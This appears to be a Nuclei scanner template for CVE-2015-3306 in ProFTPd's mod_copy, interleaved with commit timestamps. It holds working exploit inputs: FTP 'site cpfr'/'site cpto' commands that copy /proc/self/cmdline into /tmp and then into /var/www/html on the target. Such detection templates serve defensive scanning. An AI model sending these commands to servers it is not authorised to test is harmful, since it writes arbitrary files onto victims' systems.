2021-02-23 22:13:48 +00:00
id : CVE-2015-3306
info :
name : ProFTPd RCE
2021-04-06 06:46:11 +00:00
author : pdteam
2021-02-23 22:13:48 +00:00
severity : high
reference : https://github.com/t0kx/exploit-CVE-2015-3306
2021-03-11 16:23:31 +00:00
description : The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
2021-03-11 15:14:26 +00:00
tags : cve,cve2015,ftp,rce,network
2021-02-23 22:13:48 +00:00
network :
- inputs :
- data : "site cpfr /proc/self/cmdline\r\n"
read : 1024
- data : "site cpto /tmp/.{{randstr}}\r\n"
read : 1024
- data : "site cpfr /tmp/.{{randstr}}\r\n"
read : 1024
- data : "site cpto /var/www/html/{{randstr}}\r\n"
host :
2021-03-10 07:30:35 +00:00
- "{{Hostname}}:21"
2021-04-06 07:28:03 +00:00
- "{{Hostname}}"
2021-03-11 15:14:26 +00:00
2021-02-23 22:13:48 +00:00
read-size : 1024
matchers :
- type : word
words :
2021-03-11 15:14:26 +00:00
- "Copy successful"
part : raw
